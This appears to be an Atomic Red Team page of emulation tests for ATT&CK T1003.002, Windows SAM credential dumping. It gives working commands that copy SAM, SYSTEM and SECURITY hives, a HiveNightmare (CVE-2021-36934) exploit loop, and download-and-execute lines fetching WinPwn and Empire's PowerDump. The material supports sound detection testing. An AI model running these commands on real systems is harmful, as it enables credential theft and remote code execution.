# T1003.002 - OS Credential Dumping: Security Account Manager

## Description from ATT&CK

> Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
> 
> A number of tools can be used to retrieve the SAM file through in-memory techniques:
> 
> * pwdumpx.exe
> * [gsecdump](https://attack.mitre.org/software/S0008)
> * [Mimikatz](https://attack.mitre.org/software/S0002)
> * secretsdump.py
> 
> Alternatively, the SAM can be extracted from the Registry with Reg:
> 
> * <code>reg save HKLM\sam sam</code>
> * <code>reg save HKLM\system system</code>
> 
> Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
> 
> Notes:
> 
> * RID 500 account is the local, built-in administrator.
> * RID 501 is the guest account.
> * User accounts start with a RID of 1,000+.

[Source](https://attack.mitre.org/techniques/T1003/002)

## Atomic Tests

- [Atomic Test #1: Registry dump of SAM, creds, and secrets](#atomic-test-1-registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #2: Registry parse with pypykatz](#atomic-test-2-registry-parse-with-pypykatz)
- [Atomic Test #3: esentutl.exe SAM copy](#atomic-test-3-esentutlexe-sam-copy)
- [Atomic Test #4: PowerDump Hashes and Usernames from Registry](#atomic-test-4-powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5: dump volume shadow copy hives with certutil](#atomic-test-5-dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6: dump volume shadow copy hives with System.IO.File](#atomic-test-6-dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7-winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
- [Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)](#atomic-test-8-dumping-of-sam-creds-and-secretsreg-export)

### Atomic Test #1: Registry dump of SAM, creds, and secrets

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

**Supported Platforms:** Windows

**auto_generated_guid:** `5c2571d0-1572-416d-9676-812e64ca9f44`

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```

#### Cleanup Commands

```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
### Atomic Test #2: Registry parse with pypykatz

Parses registry hives to obtain stored credentials.

Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

**Supported Platforms:** Windows

**auto_generated_guid:** `a96872b2-cbf3-46cf-8eb4-27e8c0e85263`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_002|

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
"#{venv_path}\Scripts\pypykatz" live lsa
```


#### Dependencies: Run with `powershell`!

##### Description: Computer must have python 3 installed

###### Check Prereq Commands

```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```

##### Description: Computer must have venv configured at #{venv_path}

###### Check Prereq Commands

```powershell
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
py -m venv "#{venv_path}"
```

##### Description: pypykatz must be installed

###### Check Prereq Commands

```powershell
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
```

### Atomic Test #3: esentutl.exe SAM copy

Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.

**Supported Platforms:** Windows

**auto_generated_guid:** `a90c2f4d-6726-444e-99d2-a00cd7c20480`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | string | SAM|
| copy_dest | Destination of the copied file | string | %temp%|

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
```

#### Cleanup Commands

```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
```
### Atomic Test #4: PowerDump Hashes and Usernames from Registry

Executes a hashdump by reading the hashes from the registry.

**Supported Platforms:** Windows

**auto_generated_guid:** `804f28fc-68fc-40da-b5a2-e9d0bce5c193`

#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
```


#### Dependencies: Run with `powershell`!

##### Description: PowerDump script must exist on disk at specified location

###### Check Prereq Commands

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
```

###### Get Prereq Commands

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
```

### Atomic Test #5: dump volume shadow copy hives with certutil

Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)

**Supported Platforms:** Windows

**auto_generated_guid:** `eeb9751a-d598-42d3-b11c-c122d9c3f6c7`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|

#### Attack Commands: Run with `command_prompt`!

```cmd
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
```

#### Cleanup Commands

```cmd
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
```
### Atomic Test #6: dump volume shadow copy hives with System.IO.File

Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)

**Supported Platforms:** Windows

**auto_generated_guid:** `9d77fed7-05f8-476e-a81b-8ff0472c64d0`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | string | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|

#### Attack Commands: Run with `powershell`!

```powershell
1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```

#### Cleanup Commands

```powershell
1..#{limit} | % {
  rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
### Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn

**Supported Platforms:** Windows

**auto_generated_guid:** `0c0f5f06-166a-4f4d-bb4a-719df9a01dbb`

#### Attack Commands: Run with `powershell`!

```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
```

### Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.

**Supported Platforms:** Windows

**auto_generated_guid:** `21df41be-cdd8-4695-a650-c3981113aa3c`

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
```

#### Cleanup Commands

```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```